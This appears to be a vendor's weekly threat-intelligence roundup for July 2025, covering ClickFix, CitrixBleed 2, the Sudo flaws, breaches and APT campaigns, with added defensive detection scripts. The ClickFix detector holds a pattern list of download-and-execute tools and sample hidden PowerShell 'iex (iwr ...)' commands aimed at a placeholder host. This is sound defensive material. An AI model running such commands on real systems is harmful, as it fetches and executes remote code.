The week of July 2-10, 2025 saw a significant escalation in cybersecurity threats, with multiple critical incidents affecting major organizations globally. The period was marked by ransomware attacks on critical infrastructure, zero-day vulnerabilities under active exploitation, and the emergence of new APT campaigns targeting government entities.
Key developments include the SafePay ransomware attack on global IT distributor Ingram Micro, the massive Qantas Airlines data breach affecting 5.7 million customers, and the disclosure of multiple critical vulnerabilities including CitrixBleed 2 (CVE-2025-5777) and critical Sudo flaws affecting Linux systems. The week also saw Microsoft's Patch Tuesday release addressing 137 vulnerabilities and sophisticated APT campaigns by Iranian and Chinese threat actors.
New Hacking Techniques
1. ClickFix Social Engineering Evolution
Date of Major Surge: July 2025
Overview
The ClickFix social engineering technique experienced a dramatic 517% surge in the first half of 2025, becoming the second most common attack vector behind only phishing. This technique has evolved beyond simple clipboard hijacking to sophisticated multi-stage campaigns targeting government and corporate entities.
Technical Evolution
The ClickFix technique has evolved to include:
- Pastejacking Integration: Malicious clipboard hijacking automatically inserts PowerShell commands
- Multi-Platform Targeting: Attacks now affect Windows, Linux, and macOS systems
- Nation-State Adoption: APT groups including APT28 (Russia), MuddyWater (Iran), and North Korean actors have incorporated ClickFix into their operations
- Fake CAPTCHA Integration: Advanced social engineering using legitimate-looking verification prompts
Attack Methodology
Recent campaigns demonstrate sophisticated targeting:
- Lure Creation: Spoofed government websites and document verification portals
- Clipboard Manipulation: Invisible Unicode characters used to hide malicious commands
- Multi-Stage Deployment: NetSupport RAT, Latrodectus, and Lumma Stealer deployment
- Persistence: Registry modifications and advanced evasion techniques
Impact Assessment
Singapore’s Cyber Security Agency issued active alerts on July 10, 2025, warning of ongoing campaigns targeting technology, financial services, manufacturing, and government sectors. The technique bypasses traditional security controls by relying on user execution rather than exploit delivery.
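Because ClickFix depends on the user pasting a command, the defensive signal is the command itself: invisible Unicode characters that hide parts of it, encoded PowerShell, and hidden-window or download-and-execute switches. The following is an added example, not code from the original report, that scores a single command line (from a clipboard capture, a Run-dialog history entry, or a process-creation log) on those indicators. The sample inputs and the token list are constructed for illustration; example.invalid is a reserved, non-resolving hostname.

```python
import base64
import re
import unicodedata

# Invisible Unicode characters commonly used to hide parts of a pasted command.
# All of them are in Unicode category "Cf" (format), which the stripper also removes.
INVISIBLE_CHARS = {
    "\u200b", "\u200c", "\u200d", "\u2060", "\ufeff",   # zero-width characters
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",   # bidi embedding/override
    "\u2066", "\u2067", "\u2068", "\u2069",             # bidi isolates
}

# Substrings typical of commands a ClickFix lure asks the user to paste into the
# Run dialog or a terminal (matched case-insensitively after cleaning).
SUSPICIOUS_TOKENS = [
    r"powershell(\.exe)?\s", r"-e(nc|ncodedcommand)?\s", r"-w(indowstyle)?\s+hidden",
    r"\biex\b", r"invoke-expression", r"downloadstring", r"invoke-webrequest", r"\biwr\b",
    r"mshta(\.exe)?\s", r"curl\s.*\|\s*(ba)?sh\b", r"wget\s.*\|\s*(ba)?sh\b", r"osascript",
]


def strip_invisible(text):
    """Return (cleaned_text, count_of_invisible_characters_removed)."""
    cleaned = "".join(
        ch for ch in text
        if ch not in INVISIBLE_CHARS and unicodedata.category(ch) != "Cf"
    )
    return cleaned, len(text) - len(cleaned)


def decode_encoded_command(text):
    """Return the UTF-16LE script behind a PowerShell -EncodedCommand argument,
    or None when the text carries no decodable payload."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", text, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_pasted_command(text):
    """Score one command line and return the indicators behind the verdict."""
    cleaned, hidden = strip_invisible(text)
    hits = [p for p in SUSPICIOUS_TOKENS if re.search(p, cleaned, re.I)]
    decoded = decode_encoded_command(cleaned)
    if decoded:
        hits += [p for p in SUSPICIOUS_TOKENS
                 if p not in hits and re.search(p, decoded, re.I)]
    # Hidden characters are the strongest single signal: legitimate commands never need them.
    score = len(hits) + (2 if hidden else 0) + (1 if decoded else 0)
    return {
        "hidden_chars": hidden,
        "indicators": hits,
        "decoded_command": decoded,
        "verdict": "suspicious" if score >= 2 else "benign",
    }


# Constructed sample inputs (no real infrastructure; example.invalid never resolves).
SAMPLE_CLICKFIX = 'powershell\u200b -w hidden -c "iex (iwr http://example.invalid/verify)"'
SAMPLE_ENCODED = "powershell -enc " + base64.b64encode(
    "iex (iwr http://example.invalid/verify)".encode("utf-16-le")).decode()
SAMPLE_BENIGN = "ipconfig /flushdns"

if __name__ == "__main__":
    for sample in (SAMPLE_CLICKFIX, SAMPLE_ENCODED, SAMPLE_BENIGN):
        print(analyze_pasted_command(sample))
```

The same scoring can be run over Sysmon process-creation events or Windows 4688 command lines; the decoded script is returned so an analyst sees what the user was actually asked to run rather than a base64 blob.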
2. Attachment Hijacking Technique
Date of Observation: July 2025
Overview
IBM X-Force identified a new technique dubbed “attachment hijacking” being used by threat actors to weaponize legitimate invoice-related emails. This technique represents an evolution in email-based social engineering attacks.
Technical Methodology
The technique involves:
- Email Thread Hijacking: Attackers insert malicious content into legitimate email conversations
- Invoice Impersonation: Exploitation of business financial processes
- Contextual Legitimacy: Use of existing email threads to bypass suspicion
- Multi-Stage Payload Delivery: Progressive compromise through seemingly legitimate attachments
Operational Impact
The technique has been observed in:
- Business Email Compromise (BEC) campaigns
- Financial fraud operations
- Supply chain infiltration attempts
- Credential harvesting operations
3. Multi-Platform Attack Orchestration
Date of Observation: July 2025
Overview
Advanced Persistent Threat groups have evolved to coordinate attacks across multiple platforms simultaneously, as demonstrated by Silver Fox APT targeting Taiwan with trojanized medical software and AI tools.
Technical Innovation
Multi-platform orchestration includes:
- Cross-Platform Payloads: Single attack campaigns targeting Windows, Linux, and mobile platforms
- Supply Chain Integration: Compromise of software distribution channels
- Cloud Storage Exploitation: Use of legitimate cloud services for payload hosting
- Anti-Analysis Evasion: Platform-specific obfuscation and sandbox detection
Strategic Targeting
The approach demonstrates:
- Healthcare Sector Focus: Trojaned medical software (Philips DICOM Viewer)
- AI Tool Compromise: Backdoored AI applications and Chrome extensions
- Government Impersonation: Fake National Taxation Bureau communications
- Infrastructure Targeting: Telecommunications and critical infrastructure compromise
4. Browser-in-the-Browser (BitB) Attack Evolution
Date of Continued Evolution: July 2025
Overview
Browser-in-the-Browser attacks have evolved beyond simple popup windows to sophisticated multi-stage campaigns targeting government and financial institutions.
Technical Advancement
Modern BitB attacks include:
- Full-Screen Exploitation: Mandatory full-screen modes hiding legitimate browser elements
- Government Impersonation: Fake ministry and government website interfaces
- SSO Exploitation: Advanced Single Sign-On impersonation techniques
- Multi-Browser Targeting: Cross-platform browser exploitation capabilities
Operational Sophistication
Current campaigns demonstrate:
- Legitimate Website Hosting: Use of compromised legitimate sites for hosting
- Dynamic Content Generation: Real-time adaptation to victim behavior
- Credential Harvesting: Advanced form handling and data exfiltration
- Persistence Mechanisms: Browser extension installation and configuration manipulation
Critical Zero-Day Vulnerabilities and Exploits
CVE-2025-5777: CitrixBleed 2 – Critical NetScaler Vulnerability
Date of Active Exploitation: Mid-June 2025 (disclosed July 2025)
Overview
A critical vulnerability in Citrix NetScaler ADC and NetScaler Gateway, dubbed CitrixBleed 2, has been under active exploitation since mid-June 2025. The vulnerability allows remote, unauthenticated attackers to extract valid session tokens from vulnerable NetScaler instances.
Deep Technical Analysis
CVE-2025-5777 is an out-of-bounds memory read vulnerability (CVSS 9.3) stemming from insufficient input validation. The flaw allows attackers to:
- Extract valid session tokens from memory through repeated login requests
- Bypass multi-factor authentication mechanisms
- Hijack active user sessions including administrative accounts
- Access both user and administrative management interfaces
Exploitation Mechanics
Attackers exploit the vulnerability by repeatedly sending modified login requests to the /p/u/doAuthentication.do endpoint. Each request leaks limited memory data, but with sufficient attempts, attackers can extract valuable session tokens, including “nsroot” administrative tokens.
Impact Assessment
Security researchers report attacks spanning back to July 1, 2025, with one attacking IP address previously linked to RansomHub ransomware group. The vulnerability has enabled:
- Session hijacking bypassing MFA
- Administrative account compromise
- Potential ransomware deployment
- Extended network infiltration
CISO Takeaways
Organizations must immediately audit all NetScaler deployments for compromise indicators, even if patches were applied quickly. The active exploitation timeline suggests widespread scanning and potential breaches across vulnerable installations. Implement additional monitoring for authentication anomalies and consider temporary access restrictions while conducting forensic analysis.
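Two of the compromise indicators the takeaways call for can be checked from access logs: a single source repeatedly posting to /p/u/doAuthentication.do (the memory-leak harvesting pattern described above) and one session identifier being presented from more than one client address (a hijacked session in use). The following is an added example, not code from the original report or from Citrix; the log line format and the sample records are constructed for illustration, and real NetScaler logs will need their own parser in place of parse_line.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log shape for this example:
# "<ISO timestamp> <client ip> <method> <path> <status>[ session=<id>]"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})"
    r"(?: session=(?P<session>\S+))?$"
)
AUTH_ENDPOINT = "/p/u/doAuthentication.do"   # endpoint named in the analysis above
WINDOW_SECONDS = 60
AUTH_THRESHOLD = 20   # POSTs per source in the window; tune to your user population


def parse_line(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def detect(lines):
    """Return findings: ('auth_burst', ip, count) when one source hammers the
    authentication endpoint, and ('session_reuse', session, [ips]) when one
    session identifier is presented from more than one client address."""
    findings = []
    recent_auth = defaultdict(deque)   # ip -> timestamps of its recent auth POSTs
    flagged_ips = set()
    session_ips = defaultdict(set)     # session id -> client IPs that presented it
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == AUTH_ENDPOINT:
            window = recent_auth[rec["ip"]]
            window.append(rec["ts"])
            while (rec["ts"] - window[0]) > timedelta(seconds=WINDOW_SECONDS):
                window.popleft()
            if len(window) >= AUTH_THRESHOLD and rec["ip"] not in flagged_ips:
                flagged_ips.add(rec["ip"])
                findings.append(("auth_burst", rec["ip"], len(window)))
        if rec["session"]:
            seen = session_ips[rec["session"]]
            seen.add(rec["ip"])
            if len(seen) == 2:        # report once, when the second address appears
                findings.append(("session_reuse", rec["session"], sorted(seen)))
    return findings


def _sample_log():
    """Constructed sample: one real login, a 25-request burst from another address,
    then that address reusing the first user's session."""
    t0 = datetime(2025, 7, 1, 2, 15, 0)
    lines = [f"{t0.isoformat()} 198.51.100.5 POST {AUTH_ENDPOINT} 200 session=sess-4f1a"]
    lines += [f"{(t0 + timedelta(seconds=i)).isoformat()} 203.0.113.7 POST {AUTH_ENDPOINT} 200"
              for i in range(25)]
    lines.append(f"{(t0 + timedelta(seconds=40)).isoformat()} 203.0.113.7 GET /vpn/index.html 200 session=sess-4f1a")
    return lines


SAMPLE_LOG = _sample_log()

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Session reuse across addresses is the higher-fidelity signal: a burst of logins can be a misconfigured client, but a session minted for one user and then presented from an unrelated address, with no new authentication in between, is exactly what a stolen token looks like and should trigger the forensic review the takeaways describe.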
Critical Sudo Vulnerabilities: CVE-2025-32462 and CVE-2025-32463
Date of Disclosure: July 4, 2025
Overview
Two critical vulnerabilities in the Sudo command-line utility affect all major Linux distributions, allowing local attackers to escalate privileges to root access. The flaws impact Sudo versions before 1.9.17p1.
Technical Analysis
CVE-2025-32462 (CVSS 2.8) – A 12-year-old vulnerability in Sudo’s host option that allows privilege escalation when specific host-based configurations are used. The flaw affects shared sudoers files common in enterprise environments.
CVE-2025-32463 (CVSS 9.3) – A critical chroot option vulnerability allowing any local user to gain root privileges by exploiting malicious /etc/nsswitch.conf files within user-controlled directories. This vulnerability affects default Sudo configurations.
Exploitation Scenarios
CVE-2025-32463 enables unprivileged users to:
- Create fake nsswitch.conf files in chroot directories
- Trick Sudo into loading malicious shared libraries
- Achieve full root access without requiring sudoers file entries
- Bypass all existing privilege restrictions
Impact Assessment
The vulnerabilities affect major Linux distributions including Ubuntu, Red Hat, Debian, and AlmaLinux. CVE-2025-32463 is particularly dangerous as it affects default configurations and requires no pre-existing sudo privileges.
CISO Takeaways
Immediate patching to Sudo version 1.9.17p1 is critical, especially for internet-facing and multi-user systems. Organizations should audit sudoers configurations and implement additional monitoring for unusual privilege escalation attempts. The age of CVE-2025-32462 suggests potential long-term compromise in environments with vulnerable configurations.
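A quick way to act on these takeaways is to verify the installed Sudo release against the 1.9.17p1 boundary stated above and to inventory which sudoers rules use the two features involved: the chroot option (a CHROOT= tag or the runchroot default) and host-scoped rules, which are what the -h/--host option in CVE-2025-32462 interacts with. The following is an added example, not code from the report or from the Sudo project; the sample sudoers file is constructed, and the script assumes a Linux host where `sudo --version` is available (reading /etc/sudoers itself needs root, so a copied file can be passed as an argument instead).

```python
import re
import subprocess
import sys

FIXED_VERSION = "1.9.17p1"   # first release with both fixes, per the advisory summary above


def parse_version(text):
    """Extract (major, minor, patch, plevel) from text such as 'Sudo version 1.9.16p2'.
    A release without a 'pN' suffix sorts below its own p1 patch release."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"no sudo version found in: {text!r}")
    major, minor, patch, plevel = m.groups()
    return int(major), int(minor), int(patch), int(plevel or 0)


def is_patched(version_text):
    return parse_version(version_text) >= parse_version(FIXED_VERSION)


def audit_sudoers(text):
    """Return (line_number, reason) for sudoers lines that use the features the two
    CVEs involve: the chroot option and host-scoped user specifications."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        if re.search(r"\bCHROOT=", line):
            findings.append((n, "CHROOT= tag: command runs under sudo's chroot option"))
        if line.startswith("Defaults") and "runchroot" in line:
            findings.append((n, "runchroot default enables chroot for matching rules"))
        if re.match(r"^(Defaults|\w+_Alias)\b", line):
            continue                              # not a user specification
        m = re.match(r"^\S+\s+(\S+)\s*=", line)   # user  host = (runas) commands
        if m and m.group(1).upper() != "ALL":
            findings.append((n, f"host-scoped rule for '{m.group(1)}' (relevant to CVE-2025-32462)"))
    return findings


# Constructed sample for this example, not a real configuration.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
Defaults runchroot=/srv/jail
Host_Alias WEB = web01, web02
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
alice WEB = (root) /usr/bin/systemctl restart nginx
bob ALL=(root) CHROOT=/srv/jail /bin/ls
"""


def local_sudo_version():
    """Run 'sudo --version' (needs no privileges) and return its output."""
    return subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    try:
        out = local_sudo_version()
        status = "patched" if is_patched(out) else f"VULNERABLE, update to {FIXED_VERSION}"
        print(out.splitlines()[0], "->", status)
    except (FileNotFoundError, ValueError, IndexError) as e:
        print("could not determine sudo version:", e)
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/sudoers"
    try:
        with open(path) as f:
            for n, reason in audit_sudoers(f.read()):
                print(f"{path}:{n}: {reason}")
    except OSError as e:
        print(f"could not read {path} (run as root or pass a copy):", e)
```

The version check is the part that matters for CVE-2025-32463, since the report notes it affects default configurations; the sudoers inventory is for prioritising which hosts to review for historical abuse of the older host-option flaw.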
Major Ransomware and Data Breach Incidents
Ingram Micro SafePay Ransomware Attack
Date of Attack: July 3-4, 2025
Overview
Global IT distributor Ingram Micro, reporting $48 billion in annual sales, suffered a significant SafePay ransomware attack during the July 4th holiday weekend, disrupting operations worldwide.
Technical Analysis
The attack demonstrates sophisticated pre-positioning and timing:
Attack Vector: Exploitation of GlobalProtect VPN platform through compromised credentials
Impact Scope:
- Complete website and ordering system shutdown
- Xvantage distribution platform offline
- Impulse license provisioning system compromised
- Employee work-from-home mandates across multiple locations
SafePay Ransomware Profile
SafePay represents a relatively new but highly active ransomware operation:
- First observed: November 2024
- Victim count: Over 220 organizations
- Average data theft: 111GB per victim
- Notable previous targets: Conduent (government contractor), Microlise (British tech), Marlboro-Chesterfield Pathology (236,000 patient records)
Recovery Operations
Ingram Micro’s response included:
- Company-wide password and MFA resets
- Gradual VPN access restoration
- Phased system recovery beginning July 8, 2025
- Enhanced monitoring and security measures implementation
CISO Takeaways
The attack highlights vulnerabilities in VPN infrastructure during holiday periods when security staffing may be reduced. Organizations should implement enhanced monitoring during low-staffing periods and ensure robust backup systems for critical business operations. The rapid response and recovery efforts demonstrate the importance of pre-planned incident response procedures.
Qantas Airlines Data Breach
Date of Incident: June 30, 2025 (disclosed July 2, 2025, within this reporting period)
Overview
Qantas Airways disclosed a massive data breach affecting 5.7 million customers after attackers compromised a third-party customer service platform used by an offshore call center.
Technical Impact Assessment
Affected Customer Data:
- 2.8 million records: Names, email addresses, frequent flyer numbers
- 1.2 million records: Names and email addresses only
- 1.7 million records: Comprehensive data including addresses, birthdates, phone numbers, meal preferences
Attack Methodology
The breach demonstrates sophisticated targeting of third-party service providers:
- Compromise of offshore call center systems
- Access to customer service platform containing historical data
- Potential use of vishing and pretexting tactics (attributed to Scattered Spider group)
Response Timeline
- June 30, 2025: Breach detection and containment
- July 2, 2025: Public disclosure
- July 7, 2025: Contact from alleged attackers
- July 9, 2025: Detailed customer impact assessment released
CISO Takeaways
The incident underscores critical third-party risk management challenges. Organizations must implement robust vendor security assessments and continuous monitoring of third-party access to sensitive data. The rapid detection and containment demonstrate effective incident response capabilities, while the extended impact assessment timeline reflects the complexity of modern data environments.
Advanced Persistent Threat Campaigns
BladedFeline APT Targets Iraqi and Kurdish Officials
Date Range: June-July 2025 operations
Overview
Iran-aligned APT group BladedFeline, assessed with medium confidence to be a sub-cluster of OilRig, continued sophisticated cyberespionage operations targeting Iraqi and Kurdish government officials with an evolved toolkit.
Technical Arsenal Evolution
Whisper Backdoor: Novel C#/.NET backdoor that:
- Infiltrates Microsoft Exchange servers via compromised webmail accounts
- Uses email attachments for covert C2 communication
- Implements inbox rules for message filtering
- Executes PowerShell scripts and file manipulation commands
PrimeCache IIS Module: Malicious web server component that:
- Functions as passive backdoor in IIS environments
- Shares code similarities with OilRig’s RDAT backdoor
- Provides persistent access through web server infrastructure
Targeting and Impact
BladedFeline has maintained access to target networks since 2017, demonstrating:
- Long-term persistence in government networks
- Expansion to telecommunications infrastructure (Uzbekistan provider)
- Continuous tool development and operational security improvements
- Strategic intelligence collection aligned with Iranian geopolitical interests
CISO Takeaways
The eight-year persistence timeline demonstrates the challenge of detecting sophisticated nation-state actors. Organizations should implement comprehensive logging across email and web server infrastructure, conduct regular threat hunting exercises, and maintain robust network segmentation to limit lateral movement capabilities.
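Whisper's use of inbox rules to filter its own C2 messages is something mailbox administrators can hunt for: rules that silently delete or bury mail matching a keyword or attachment condition, or that forward mail out of the mailbox. The following is an added example, not code from the report or from ESET's analysis. It assumes rules have been exported as JSON with the property names used by Exchange's Get-InboxRule cmdlet (Name, Enabled, SubjectContainsWords, BodyContainsWords, HasAttachment, DeleteMessage, MoveToFolder, MarkAsRead, ForwardTo, ForwardAsAttachmentTo, RedirectTo); the sample export is constructed.

```python
import json

# Folders a user rarely looks at; rules that route mail there, mark it read, or
# delete it outright are the classic way to hide a covert mail channel.
HIDE_FOLDERS = {"deleted items", "rss feeds", "rss subscriptions", "archive",
                "junk email", "conversation history"}


def score_rule(rule):
    """Return the list of reasons a rule looks like it hides or diverts mail."""
    reasons = []
    if rule.get("DeleteMessage"):
        reasons.append("deletes matching mail")
    folder = (rule.get("MoveToFolder") or "").split("\\")[-1].lower()
    if folder in HIDE_FOLDERS:
        reasons.append(f"moves matching mail to '{folder}'")
    hides = bool(reasons)
    if hides and rule.get("MarkAsRead"):
        reasons.append("marks hidden mail as read")
    if hides and rule.get("HasAttachment"):
        reasons.append("keyed on attachment presence")
    keywords = rule.get("SubjectContainsWords") or rule.get("BodyContainsWords") or []
    if hides and keywords:
        reasons.append(f"keyed on keywords {keywords}")
    if rule.get("ForwardTo") or rule.get("ForwardAsAttachmentTo") or rule.get("RedirectTo"):
        reasons.append("forwards or redirects mail outside the mailbox")
    return reasons


def audit_rules(export_json):
    """Parse an inbox-rule export and return (rule name, reasons) for enabled rules
    that either forward mail out or show at least two hiding traits."""
    rules = json.loads(export_json)
    if isinstance(rules, dict):
        rules = [rules]
    flagged = []
    for rule in rules:
        if not rule.get("Enabled", True):
            continue
        reasons = score_rule(rule)
        forwards = any(r.startswith("forwards") for r in reasons)
        if forwards or len(reasons) >= 2:
            flagged.append((rule.get("Name", "<unnamed>"), reasons))
    return flagged


# Constructed sample export: one ordinary rule, one hiding rule with a throwaway
# name, one disabled rule, and one forwarding rule. example.invalid never resolves.
SAMPLE_EXPORT = json.dumps([
    {"Name": "Newsletters", "Enabled": True, "FromAddressContainsWords": ["news@"],
     "MoveToFolder": "\\Inbox\\Newsletters"},
    {"Name": ".", "Enabled": True, "SubjectContainsWords": ["ref-"], "HasAttachment": True,
     "DeleteMessage": True, "MarkAsRead": True},
    {"Name": "Old cleanup", "Enabled": False, "DeleteMessage": True, "MarkAsRead": True,
     "BodyContainsWords": ["unsubscribe"]},
    {"Name": "Backup", "Enabled": True, "ForwardTo": ["backup@example.invalid"]},
])

if __name__ == "__main__":
    for name, reasons in audit_rules(SAMPLE_EXPORT):
        print(f"{name!r}: " + "; ".join(reasons))
```

Run over exports from all mailboxes, the flagged rules are a small, reviewable set; a rule with a one-character name that deletes attachment-bearing mail matching a fixed token is the shape to treat as a hunt lead and correlate with the web server and PowerShell logging the takeaways recommend.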
Silver Fox APT Taiwan Campaign Enhancement
Date Range: Ongoing through July 2025
Overview
Chinese state-sponsored Silver Fox APT (also known as Void Arachne) expanded operations targeting Taiwanese organizations with sophisticated multi-stage malware campaigns using trojanized medical software.
Advanced Attack Methodology
Initial Access Vectors:
- SEO poisoning targeting medical software searches
- Trojanized Philips DICOM Viewer (MediaViewerLauncher.exe)
- Phishing emails impersonating National Taxation Bureau
- Backdoored installers for Chrome, VPN clients, and AI tools
Technical Innovation:
- Alibaba Cloud Object Storage for payload hosting
- Anti-VM and sandbox evasion techniques
- TrueSightKiller vulnerable driver for AV bypass
- Multi-stage encryption and obfuscation
- ValleyRAT/Winos 4.0 final payload deployment
Strategic Targeting
Silver Fox demonstrates sophisticated understanding of target environments:
- Healthcare delivery organizations (HDOs)
- Government sector entities
- Critical infrastructure components
- Telecommunications networks
CISO Takeaways
The medical software trojanization represents a concerning evolution in supply chain attacks targeting critical infrastructure. Healthcare organizations should implement enhanced verification procedures for medical software, monitor for unauthorized cloud storage access, and deploy behavioral analytics to detect multi-stage attack progressions.
Critical Vulnerability Disclosures
ServiceNow Count(er) Strike (CVE-2025-3648)
Date of Disclosure: July 8, 2025
Overview
Varonis Threat Labs disclosed a high-severity data inference vulnerability in ServiceNow’s platform that enables unauthorized access to sensitive data through misconfigured ACLs.
Technical Analysis
CVE-2025-3648 (CVSS 8.2) exploits the record count UI element on list pages to:
- Infer sensitive data from restricted tables
- Bypass access control mechanisms
- Extract PII, credentials, and configuration data
- Impact hundreds of ServiceNow tables across instances
Exploitation Requirements
The vulnerability requires only:
- Minimal table access permissions
- Knowledge of table enumeration techniques
- Ability to craft range query requests
- Understanding of conditional ACL configurations
Impact Scope
The flaw potentially affects:
- All ServiceNow instances prior to May 2025 updates
- Fortune 500 organizations (85% of ServiceNow customer base)
- Government and healthcare ServiceNow deployments
- Custom and standard table configurations
CISO Takeaways
Organizations using ServiceNow should immediately review ACL configurations, implement Query ACLs and Security Data Filters, and audit custom table permissions. The vulnerability’s simplicity combined with ServiceNow’s widespread adoption makes it a significant concern for enterprise security.
TeleMessage TM SGNL Critical Flaws
Date of KEV Addition: July 2, 2025
Overview
CISA added two actively exploited TeleMessage vulnerabilities to the Known Exploited Vulnerabilities catalog, with federal agencies required to remediate by July 22, 2025.
Vulnerability Details
CVE-2025-48927: Spring Boot Actuator misconfiguration exposing /heapdump endpoint enabling memory dump downloads and privilege escalation
CVE-2025-48928: JSP application core dump exposure allowing password extraction from HTTP traffic included in heap dumps
Strategic Significance
TeleMessage’s use by government officials, including Secret Service members, amplifies the security implications:
- Over 60 U.S. government users affected
- Metadata and chat logs exposed on Distributed Denial of Secrets
- Trump administration officials previously used the platform
- Regulatory compliance implications for government communications
CISO Takeaways
The incident highlights risks in government communication platforms and the importance of security-by-design principles. Organizations should audit messaging platform configurations, implement secure development practices, and maintain strict access controls for sensitive communication systems.
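The Actuator misconfiguration behind CVE-2025-48927 is a property-file setting, so auditing for it is mechanical: the heapdump endpoint is only reachable over HTTP when it is enabled and included in the web exposure list without being excluded. The following is an added example, not code from the report or from TeleMessage, that parses a Spring Boot application.properties file and decides whether heapdump is exposed, with a weak configuration beside a hardened one. Both configurations are constructed; the defaults it assumes (endpoint enabled, only health exposed over the web, exclude overriding include) follow Spring Boot's documented behaviour.

```python
def parse_properties(text):
    """Minimal parser for Java .properties files (key=value or key: value, # / ! comments)."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            key, sep, value = line.partition(":")
        props[key.strip()] = value.strip()
    return props


def _csv(value):
    return {item.strip().lower() for item in value.split(",") if item.strip()}


def heapdump_exposed(props):
    """True when the heapdump actuator endpoint is reachable over HTTP with these settings."""
    if props.get("management.endpoint.heapdump.enabled", "true").strip().lower() == "false":
        return False
    include = _csv(props.get("management.endpoints.web.exposure.include", "health"))
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    if "*" in exclude or "heapdump" in exclude:   # exclude wins over include
        return False
    return "*" in include or "heapdump" in include


def check_properties(text):
    """Return a one-line verdict for a properties file's contents."""
    return ("EXPOSED: /actuator/heapdump reachable over HTTP"
            if heapdump_exposed(parse_properties(text)) else "ok: heapdump not web-exposed")


# Constructed example: the wildcard exposes every endpoint, heapdump included.
WEAK_CONFIG = """\
management.endpoints.web.exposure.include=*
"""

# Constructed example: expose only what operations needs, exclude the dangerous
# endpoints explicitly, and disable heapdump outright so no later include revives it.
HARDENED_CONFIG = """\
management.endpoints.web.exposure.include=health,info,metrics
management.endpoints.web.exposure.exclude=heapdump,env
management.endpoint.heapdump.enabled=false
"""

if __name__ == "__main__":
    print("weak:    ", check_properties(WEAK_CONFIG))
    print("hardened:", check_properties(HARDENED_CONFIG))
```

Even a correctly scoped exposure list leaves the remaining endpoints on the same listener as the application; placing Actuator on a separate management port that is not internet-reachable, and requiring authentication for it, is the layer that limits the blast radius when a setting regresses.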
Ransomware Ecosystem Evolution
H1 2025 Statistical Analysis
Recent intelligence reveals significant ransomware landscape changes:
Key Metrics:
- 3,627 total attacks (47% increase from H1 2024)
- 445 confirmed attacks affecting 17+ million records
- Average ransom demand: $1.6 million
- Government targets: 60% increase
- Educational institutions: 23% increase
Leading Ransomware Groups:
- Akira: 347 victims (most prolific)
- Qilin: 318 victims (maintaining market position)
- RansomHub: 222 victims (emerging threat)
- SafePay: 186 victims (rapid growth since November 2024)
CISO Takeaways
The significant increase in government and educational targeting reflects evolving ransomware strategies. Organizations should enhance backup and recovery capabilities, implement behavioral analytics for early detection, and maintain robust incident response procedures.
Underground Threat Intelligence
Dark Web Market Fragmentation
Current intelligence indicates continued fragmentation of cybercrime ecosystems:
Market Dynamics:
- Increased law enforcement pressure causing group dispersal
- Evolution toward encryption-less extortion models
- Enhanced anonymity through I2P network adoption
- Expansion of AI-powered attack tool development
Notable Developments:
- Hunters International rebranding to “World Leaks”
- Pay2Key.I2P Iranian ransomware group resurgence
- Cryptocurrency exchange data trading increases
- Enhanced social engineering through deepfake technology
CISO Takeaways
The fragmentation of traditional cybercrime markets creates unpredictable threat landscapes. Organizations should maintain flexible threat intelligence programs and prepare for novel attack vectors emerging from underground innovation.
Outpace Attackers With AI-Based Automated Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management